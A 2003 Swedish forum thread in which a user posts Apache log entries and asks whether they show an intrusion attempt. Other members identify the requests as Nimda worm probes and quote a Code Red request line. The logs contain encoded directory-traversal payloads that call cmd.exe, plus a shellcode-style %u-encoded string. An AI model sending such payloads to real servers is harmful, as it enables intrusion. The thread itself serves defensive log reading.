Är detta ett intrångs försök?

2003-05-23 11:07

Permalänk

wallis

Medlem

Plats: Trollhättan
Registrerad: Okt 2002

●

Är detta ett intrångs försök?

Detta hittade jag i min apache log fil är det ett intrångs försök?

[23/May/2003:10:49:25 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 284
[23/May/2003:10:49:26 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 282
[23/May/2003:10:49:26 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
[23/May/2003:10:49:26 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
[23/May/2003:10:49:26 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
[23/May/2003:10:49:27 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
[23/May/2003:10:49:27 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
[23/May/2003:10:49:27 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339
[23/May/2003:10:49:27 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
[23/May/2003:10:49:27 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
[23/May/2003:10:49:27 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
[23/May/2003:10:49:28 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
[23/May/2003:10:49:28 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
[23/May/2003:10:49:28 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
[23/May/2003:10:49:28 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
[23/May/2003:10:49:28 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306

Visa signatur

Brommsen dödar farten.

Rapportera Redigera

Citera flera Citera

2003-05-23 11:10

Permalänk

denka

Medlem

Registrerad: Jan 2002

●

Ja

Rapportera Redigera

Citera flera Citera

2003-05-23 11:11

Permalänk

torden

Medlem

Plats: Vasastan
Registrerad: Okt 2001

●

Ser väl mest ut som någon mask..

Men jo det är nog ett intrångsförsök.

Visa signatur

[size="1"]Den åttonde dvärgen
Zwei dinge sind unendlich, die dumheit und das all.
Jag har makten, här i trakten. Jag leker gud.[/size]

Rapportera Redigera

Citera flera Citera

2003-05-23 11:15

Permalänk

Er1kssoN

Medlem ★

Registrerad: Jul 2001

●

Grrr..!

Jag har exakt samma sak på min apache log....men det e nog inget och va rädd för. Det är ganska svårt och komma åt winnt/system32/cmd.exe i Linux

Visa signatur

Rapportera Redigera

Citera flera Citera

2003-05-23 11:25

Permalänk

wallis

Medlem

Plats: Trollhättan
Registrerad: Okt 2002

●

Någon som vet vad det är för slags mask?

Visa signatur

Brommsen dödar farten.

Rapportera Redigera

Citera flera Citera

2003-05-23 11:33

Permalänk

Gribber

Medlem

Plats: Sundsvall
Registrerad: Jul 2001

●

code red eller nimda.

Senast redigerat 2003-05-24 14:22

Visa signatur

Hej

Rapportera Redigera

Citera flera Citera

2003-05-23 13:29

Permalänk

pixas

Medlem

Plats: göteborg.
Registrerad: Nov 2001

●

Nimda.

Code Red har en ända lång request. Nimda har flera korta. syns tydlig skillnad.
Om du inte kör windows med IIS så behöver du inte orora dig.

edit: såhär ser code red ut:

213.114.*.*- - [07/May/2003:19:57:33 +0200] "GET /default.ida?XXXXXX|: *klipp* :|XXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 283

Senast redigerat 2003-05-23 13:38

Visa signatur

Har du nhGPS? kolla detta.
Fotograferar lite ibland när jag har tid. Annars jobbar jag som fotograf.

Rapportera Redigera

Citera flera Citera

2003-05-23 15:00

Permalänk

anon20145

Inaktiv

Registrerad: Apr 2003

●

Finns det någon bra sida där man har samlat och visar hur olika server logs ser ut när olika script och hackers försök med nått så man kan se vad man har drabbats av?

Rapportera Redigera

Citera flera Citera

2003-05-23 15:47

Permalänk

CseeZ

Medlem

Plats: Umeå Fattighuset
Registrerad: Okt 2002

●

Så länge man patchar programvaran så är det lungt, men japp det e en mask. Just när dom där kom ut så såg statestiken rolig ut på dom flesta servrarna i världen
Men Det är inget du kan bry dig om, personen som skickar är nog inte medveten om säkerhetshålet och gör det altså inte medvetet. Däremot så bör du vara orolig om du har IIS eller va windows webserver heter och ej patchat den på senare tid.

Visa signatur

"Don't you worry, i'm a gamm-M.U.C.K.:ad signalmekaniker."
AMD Athlon 64 3200+ 1024mb ram PC3200, GF6800GT 128Mb, ~800Gb (Dumma D70 som slukar HDD >.<) Hdd SB Audigy2 platinum
Atmel ATmega8515 @ 4mhz, 5v core. Har full koll på 8 LED iallafall

Rapportera Redigera

Citera flera Citera

Är detta ett intrångs försök?

Är detta ett intrångs försök?

Grrr..!

Externa nyheter

Spelnyheter från FZ